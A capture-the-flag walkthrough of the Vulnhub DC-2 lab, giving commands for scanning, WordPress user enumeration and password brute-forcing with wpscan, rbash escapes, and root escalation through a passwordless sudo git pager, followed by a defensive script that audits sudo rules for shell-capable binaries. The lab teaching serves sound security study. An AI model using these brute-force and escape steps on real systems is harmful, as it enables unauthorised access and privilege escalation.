DC-2
青 叶

Notice: This essay was written in English.

The file I downloaded from Vulnhub didn't show any network problems on my VMware, but if you run into network problems, please see this essay: Fix Network Problem In Vulnhub Virtual Machine

FLAG 1

Use nmap to scan for information:

nmap -sC -sV -A -p- 192.168.145.135 -T5 -oN nmap

and this is my result:

image

We can confirm that there are web and SSH services on the server.

Let’s go on.

I use a browser to view the website, but unfortunately it redirects to http://dc-2/.

Then I edit the /etc/hosts file to make this site work, and here is my hosts file:

image

Now, let us reopen the website, and it works.

Got Flag1 easily:

image

FLAG 2

Following the hint in FLAG1, I use cewl to generate a wordlist for brute-forcing.

cewl http://dc-2/ -w wordlist

image

Now that I have the wordlist, I use wpscan:

wpscan --url http://dc-2/

The information I got was useless.

I try to use wpscan to enumerate the users:

wpscan --url http://dc-2/ -e u

And yes, I got it:

image

Then I use wpscan to brute-force the passwords:

wpscan --url http://dc-2/ -P wordlist

And I got:

image

Well done, but how can I log in?

I use dirb to scan the web paths:

dirb http://192.168.145.135

Then I found this path:

image

It redirects to /wp-login.php

I log in as user jerry and get FLAG2:

image

FLAG 3

Following the hint in FLAG2, I guess another entry point is SSH.

I tried to connect to the SSH service as user jerry but failed; fortunately, user tom could.

Because of the restrictions of rbash, I could not execute the cat command:

image

Then I use the export command to see what PATH is, and use ls to list all the available commands:

image

Well, less is available, nice!

Let me see FLAG 3:

less flag3.txt

image

FLAG 4

So, I need to su jerry.

I try to su jerry using the vi editor:

:set shell=/bin/bash
:shell

Then we add the /bin path to the PATH variable:

export PATH=$PATH:/bin

Then use su to switch user (the password is in the wpscan results):

su jerry

image

Another method to escape rbash:

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin

image

Got FLAG 4:

image

FLAG 5

I use sudo -l to check the privileges of user jerry:

sudo -l

image

Well, the git command can be run as root without a password!

I googled for help on git and found the -p argument, which makes git use more to display the information, so:

sudo git -p help -a

Then execute /bin/bash in more:

!/bin/bash

image

And we got root privileges:

image

Get Final Flag:

image
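
From the defender's side, the sudo rule used in FLAG 5 is the kind of entry a configuration audit should catch. The following is an added example, not part of the original write-up: it parses `sudo -l` output and flags rules that grant a binary able to start a shell from its pager or editor. The binary list and the sample output are assumptions constructed for illustration.

```python
import re

# Assumed, non-exhaustive list of binaries that can start a shell from
# their pager or editor interface (git hands its output to a pager).
SHELL_CAPABLE = {"git", "less", "more", "man", "vi", "vim", "view"}

# Constructed sample of `sudo -l` output (not taken from the DC-2 machine).
SAMPLE_SUDO_L = """\
User jerry may run the following commands on host:
    (root) NOPASSWD: /usr/bin/git
    (root) /usr/bin/less /var/log/syslog
    (root) NOPASSWD: /usr/sbin/service apache2 restart
    (ALL : ALL) NOPASSWD: ALL
"""

# "(runas) [TAG: ...] command[, command...]"
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudo_rules(sudo_l_output):
    """Return one finding per rule that allows ALL or a shell-capable binary."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header or other non-rule line
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            binary = cmd.split()[0]
            name = binary.rsplit("/", 1)[-1]
            if binary == "ALL" or name in SHELL_CAPABLE:
                findings.append({
                    "runas": m.group("runas").strip(),
                    "command": cmd,
                    "nopasswd": nopasswd,
                })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_SUDO_L):
        flag = "NOPASSWD" if f["nopasswd"] else "password required"
        print(f"review: ({f['runas']}) {f['command']} [{flag}]")
```

A flagged rule is a candidate for removal or for replacement with a wrapper script that runs one fixed, non-interactive invocation.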